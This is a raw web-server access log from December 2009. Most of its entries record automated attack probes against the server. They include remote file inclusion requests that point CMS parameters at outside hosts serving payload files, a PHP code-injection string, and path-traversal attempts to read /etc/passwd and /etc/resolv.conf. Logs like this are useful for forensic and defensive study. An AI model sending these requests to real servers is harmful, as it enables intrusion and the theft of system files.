95.110.198.81 - - [16/Dec/2009:07:26:59 -0600] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:29:29 -0600] "GET /logs/access_log.1240272000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:07:31:15 -0600] "GET /logs//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
61.47.61.97 - - [16/Dec/2009:07:31:15 -0600] "GET /logs/access_log.1228608000//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 371 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
61.47.61.97 - - [16/Dec/2009:07:31:16 -0600] "GET //includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://semtle.inje.ac.kr/bbs2/skin/daerew_45galleryGD/images/id.txt?%0D? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
91.67.216.203 - - [16/Dec/2009:07:31:56 -0600] "GET /robots.txt HTTP/1.0" 404 281 "http://majestic12.co.uk/bot.php?I=B232FC81D5-00D048DEC7A3205D-fortpit_pconline_com""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
209.151.70.1 - - [16/Dec/2009:07:31:58 -0600] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.833"
91.67.216.203 - - [16/Dec/2009:07:31:59 -0600] "GET /logs/access_log.1233619200 HTTP/1.1" 200 168494 "http://www.oounet.com/index/click?url=http://fortpit.pconline.com/logs/access_log.1233619200&query_id=129595&lang=""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
91.67.216.203 - - [16/Dec/2009:07:32:02 -0600] "GET /logs/access_log.1234224000 HTTP/1.1" 200 127661 "http://www.oounet.com/index/click?url=http://fortpit.pconline.com/logs/access_log.1234224000&query_id=129595&lang=""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
209.151.70.1 - - [16/Dec/2009:07:33:11 -0600] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.833"
209.151.70.1 - - [16/Dec/2009:07:33:11 -0600] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.833"
209.151.70.1 - - [16/Dec/2009:07:34:05 -0600] "GET /logs/access_log.1230163200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.833"
209.151.70.1 - - [16/Dec/2009:07:34:05 -0600] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.833"
209.151.70.1 - - [16/Dec/2009:07:34:05 -0600] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.833"
94.23.18.102 - - [16/Dec/2009:07:34:53 -0600] "GET /logs/access_log.1235433600/setup.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.803"
94.23.18.102 - - [16/Dec/2009:07:34:53 -0600] "GET /setup.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
94.23.18.102 - - [16/Dec/2009:07:34:54 -0600] "GET /logs/setup.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
209.151.70.1 - - [16/Dec/2009:07:36:21 -0600] "GET /logs/access_log.1230163200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.833"
209.151.70.1 - - [16/Dec/2009:07:36:22 -0600] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.833"
209.151.70.1 - - [16/Dec/2009:07:36:22 -0600] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.833"
64.124.224.98 - - [16/Dec/2009:07:36:55 -0600] "GET /mygallerybrowser.php?myPath=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
64.124.224.98 - - [16/Dec/2009:07:36:56 -0600] "GET /logs/mygallerybrowser.php?myPath=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
94.23.18.102 - - [16/Dec/2009:07:38:51 -0600] "GET /logs/index.php?setup=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
94.23.18.102 - - [16/Dec/2009:07:38:51 -0600] "GET /index.php?setup=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
70.38.64.117 - - [16/Dec/2009:07:40:50 -0600] "GET /logs/access_log.1256083200/view.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:40:50 -0600] "GET /view.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:40:50 -0600] "GET /logs/view.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
212.158.160.50 - - [16/Dec/2009:07:40:52 -0600] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 312 "-""-"
212.158.160.50 - - [16/Dec/2009:07:40:52 -0600] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 307 "-""-"
70.38.64.117 - - [16/Dec/2009:07:40:54 -0600] "GET /logs/access_log.1253404800/view.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:07:40:58 -0600] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:07:40:58 -0600] "GET /logs/access_log.1230163200//bookmark4u/lostpasswd.php?env[include_prefix]=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:07:40:58 -0600] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:07:41:17 -0600] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:07:41:17 -0600] "GET /logs/access_log.1230163200%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
201.22.7.240 - - [16/Dec/2009:07:41:17 -0600] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
65.55.106.162 - - [16/Dec/2009:07:42:08 -0600] "GET /logs/access_log.1251244800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.24.212.133 - - [16/Dec/2009:07:42:37 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:07:42:37 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:07:42:37 -0600] "GET /logs/access_log.1237075200/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:42:44 -0600] "GET /view.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:42:44 -0600] "GET /logs/access_log.1250899200/view.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:07:42:44 -0600] "GET /logs/view.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
201.24.212.133 - - [16/Dec/2009:07:42:49 -0600] "GET /logs/access_log.1239580800/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://150.214.31.248:22/Fx29ID.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:07:48:52 -0600] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:07:48:52 -0600] "GET /home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:07:48:52 -0600] "GET /logs/access_log.1243555200/home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:07:49:33 -0600] "GET /logs/access_log.1233014400/home//conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:07:50:08 -0600] "GET ///conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:07:50:08 -0600] "GET /logs///conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:07:50:08 -0600] "GET /logs/access_log.1233014400///conlib/local.php?cfg[path][contenido]=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.136.32.137 - - [16/Dec/2009:07:51:44 -0600] "GET /logs/index.php?nic=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 297 "-""-"
213.136.32.137 - - [16/Dec/2009:07:51:45 -0600] "GET /index.php?nic=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 292 "-""-"
213.136.32.137 - - [16/Dec/2009:07:51:45 -0600] "GET /logs/index.php?nic=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 297 "-""-"
213.136.32.137 - - [16/Dec/2009:07:51:46 -0600] "GET /index.php?nic=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 292 "-""-"
64.40.103.14 - - [16/Dec/2009:07:52:47 -0600] "GET /index.php?stranica=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 292 "-""-"
207.228.240.75 - - [16/Dec/2009:07:53:12 -0600] "GET /?custompluginfile[]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 3245 "-""-"
207.228.240.75 - - [16/Dec/2009:07:53:12 -0600] "GET /?custompluginfile[]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 3245 "-""-"
208.116.0.130 - - [16/Dec/2009:07:55:39 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:07:55:39 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
65.55.207.54 - - [16/Dec/2009:07:56:10 -0600] "GET /logs/access_log.1228348800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.40.103.14 - - [16/Dec/2009:07:56:26 -0600] "GET /logs/index.php?stranica=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 297 "-""-"
195.22.14.131 - - [16/Dec/2009:07:57:23 -0600] "GET /logs/access_log.1238112000%20/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 319 "-""-"
195.22.14.131 - - [16/Dec/2009:07:57:24 -0600] "GET /logs/access_log.1238112000%20/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 319 "-""-"
195.22.14.131 - - [16/Dec/2009:07:57:24 -0600] "GET /logs/access_log.1238112000%20/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 319 "-""-"
67.227.136.138 - - [16/Dec/2009:08:02:26 -0600] "GET /logs/access_log.1240272000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:26 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:26 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:31 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:31 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:31 -0600] "GET /logs/access_log.1240272000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:32 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:32 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:32 -0600] "GET /logs/access_log.1240272000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:34 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:34 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:02:34 -0600] "GET /logs/access_log.1240272000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.55.106.155 - - [16/Dec/2009:08:02:38 -0600] "GET /logs/access_log.1146700800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.227.136.138 - - [16/Dec/2009:08:03:42 -0600] "GET /logs/access_log.1237852800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:03:42 -0600] "GET /logs/access_log.1237852800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:03:43 -0600] "GET /logs/access_log.1237852800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:03:46 -0600] "GET /logs/access_log.1232323200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:03:47 -0600] "GET /logs/access_log.1232323200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:03:49 -0600] "GET /logs/access_log.1237852800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:03:52 -0600] "GET /logs/access_log.1232323200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:03:56 -0600] "GET /logs/access_log.1232323200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:06:14 -0600] "GET //?path%5Bdocroot%5D=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:06:14 -0600] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:06:15 -0600] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:06:16 -0600] "GET /logs//?path%5Bdocroot%5D=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:07:09 -0600] "GET //?path%5Bdocroot%5D=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:07:09 -0600] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:07:11 -0600] "GET /logs//?path%5Bdocroot%5D=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 200 216796 "-""Mozilla/5.0"
95.110.198.81 - - [16/Dec/2009:08:07:29 -0600] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.106.232 - - [16/Dec/2009:08:12:08 -0600] "GET /logs/access_log.1117065600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.227.136.138 - - [16/Dec/2009:08:13:53 -0600] "GET /logs/access_log.1230163200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:14:07 -0600] "GET /logs/access_log.1230163200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:14:38 -0600] "GET /logs/access_log.1230163200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:08:14:42 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:08:14:42 -0600] "GET /logs/access_log.1243209600/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:08:14:42 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:14:51 -0600] "GET /logs/access_log.1240272000%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:08:14:52 -0600] "GET /logs/access_log.1248739200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:08:14:59 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:08:14:59 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:08:14:59 -0600] "GET /logs/access_log.1243209600/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:08:14:59 -0600] "GET /logs/access_log.1248739200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:15:00 -0600] "GET /logs/access_log.1240272000%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:15:04 -0600] "GET /logs/access_log.1230163200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:15:35 -0600] "GET /logs/access_log.1240272000%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:08:16:05 -0600] "GET /logs/access_log.1240272000%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
64.40.103.14 - - [16/Dec/2009:08:20:54 -0600] "GET /logs/announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 305 "-""-"
64.40.103.14 - - [16/Dec/2009:08:20:54 -0600] "GET /announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 300 "-""-"
64.40.103.14 - - [16/Dec/2009:08:20:55 -0600] "GET /logs/announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 305 "-""-"
64.40.103.14 - - [16/Dec/2009:08:20:55 -0600] "GET /announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 300 "-""-"
67.19.173.34 - - [16/Dec/2009:08:21:36 -0600] "GET /logs/main.php?x=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
67.19.173.34 - - [16/Dec/2009:08:21:36 -0600] "GET /main.php?x=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.831"
67.19.173.34 - - [16/Dec/2009:08:23:08 -0600] "GET /logs/main.php?x=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
67.19.173.34 - - [16/Dec/2009:08:23:08 -0600] "GET /main.php?x=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.831"
221.143.42.249 - - [16/Dec/2009:08:27:28 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:27:28 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:27:28 -0600] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:28:03 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:28:03 -0600] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:28:03 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:08:28:53 -0600] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.246.53.15 - - [16/Dec/2009:08:29:59 -0600] "GET /logs/access_log.1253491200//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.namok.co.kr/fx29id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
